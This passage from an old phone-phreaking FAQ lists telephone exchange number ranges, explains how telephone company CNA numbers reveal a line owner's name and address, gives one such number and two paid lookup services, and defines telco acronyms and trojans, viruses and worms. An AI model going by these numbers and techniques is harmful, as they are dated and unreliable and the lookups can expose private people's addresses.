  886. 616  997-9996  997-9997
  887. 616  ALL-PREF  ALL-PREF
  888. 713  224-1499  759-1799
  889. 713  324-1499  324-1799
  890. 713  339-1499  339-1799
  891. 713  342-1499  342-1799
  892. 713  351-1499  351-1799
  893. 713  354-1499  354-1799
  894. 713  356-1499  356-1799
  895. 713  442-1499  442-1799
  896. 713  447-1499  447-1799
  897. 713  455-1499  455-1799
  898. 713  458-1499  458-1799
  899. 713  462-1499  462-1799
  900. 713  466-1499  466-1799
  901. 713  468-1499  468-1799
  902. 713  469-1499  469-1799
  903. 713  471-1499  471-1799
  904. 713  481-1499  481-1799
  905. 713  482-1499  482-1799
  906. 713  484-1499  484-1799
  907. 713  487-1499  487-1799
  908. 713  489-1499  489-1799
  909. 713  492-1499  492-1799
  910. 713  493-1499  493-1799
  911. 713  524-1499  524-1799
  912. 713  526-1499  526-1799
  913. 713  555-1499  555-1799
  914. 713  661-1499  661-1799
  915. 713  664-1499  664-1799
  916. 713  665-1499  665-1799
  917. 713  666-1499  666-1799
  918. 713  667-1499  667-1799
  919. 713  682-1499  976-1799
  920. 713  771-1499  771-1799
  921. 713  780-1499  780-1799
  922. 713  781-1499  997-1799
  923. 713  960-1499  960-1799
  924. 713  977-1499  977-1799
  925. 713  988-1499  988-1799
  926. 714  535-1118  535-1119
  927. 714  538-1118  538-1119
  928. 714  858-1118  858-1119
  929. 714  879-1118  879-1119
  930. 805  528-0044  528-0045
  931. 805  544-0044  544-0045
  932. 805  773-0044  773-0045
  933. 813  385-9971
  934. 908  776-9930  776-9930
  935.  
  936.  
  937. 32. What is a CNA number?
  938.  
  939. CNA stands for Customer Name and Address.  The CNA number is a phone
  940. number for telephone company personnel to call and get the name and
  941. address for a phone number.  If a telephone lineman finds a phone line
  942. he does not recognize, he can use the ANI number to find it's phone
  943. number and then call the CNA operator to see who owns it and where
  944. they live.
  945.  
  946. Normal CNA numbers are available only to telephone company personnel.
  947. Private citizens may now legally get CNA information from private
  948. companies.  Two such companies are:
  949.  
  950. Unidirectory    (900)933-3330
  951. Telename        (900)884-1212
  952.  
  953. Note that these are 900 numbers, and will cost you approximately one
  954. dollar per minute.
  955.  
  956.  
  957. 33. What is the telephone company CNA number for my area?
  958.  
  959. 614  614-464-0123
  960.  
  961.  
  962. 34. What does XXX stand for?
  963.  
  964. TLA Three Letter acronym
  965.  
  966. ALRU-Automatic Line Record Update
  967. AN-Associated Number
  968. ARSB-Automated Repair Service Bureau
  969. ATH-Abbreviated Trouble History
  970. BOC-Bell Operating Company
  971. BOR-Basic Output Report
  972. CA-Cable
  973. COE-Central Office Equipment
  974. CMC-Construction Maintenance Center
  975. CRSAB-Centralized Repair Service Answering Bureau
  976. DDD-Direct Distance Dialing
  977. ECC-Enter Cable Change
  978. LMOS-Loop Maintenance Operations System
  979. MLT-Mechanized Loop Testing
  980. POTS-Plain Old Telephone Service
  981. RSB-Repair Service Bureau
  982. SS-Special Service
  983. TAS-Telephone Answering Service
  984. TH-Trouble History
  985. TREAT-Trouble Report Evaluation and Analysis Tool
  986.  
  987. NTA: The Nocturnal Trading Alliance
  988. PE: Public Enemy
  989. TDT: The Dream Team
  990. THG: The Humble Guys
  991. THP: The Hill People
  992.  
  993.  
  994. 35. What is a trojan/worm/virus?
  995.  
  996. Trojan: A program that when run by a user does an action that the
  997.         users did not expect, or the program was not designed to do.
  998.  
  999. Virus:  A portion of code that attaches it self to other executable
  1000.         files in the attempt to replicate and spread itself.
  1001.  
  1002. Worm:   A stand alone program that acomplishes a task in the
  1003.         background by replicating and moving though a computer
  1004.         network.
  1005.  
  1006.  
  1007. 36. Where can I find more information?
  1008.  
  1009.  
  1010.  
  1011. -- 
  1012. \* Will Spencer        : The advancement and diffusion of knowledge *\
  1013. \* Unix geek           : is the only guardian of true liberty.      *\
  1014. \* PC guru             :               --  James Madison            *\
  1015. \* Revolutionary       :               4th U.S. President           *\
  1016. End of article 12510 (of 12700)--what next? [npq] 
  1017.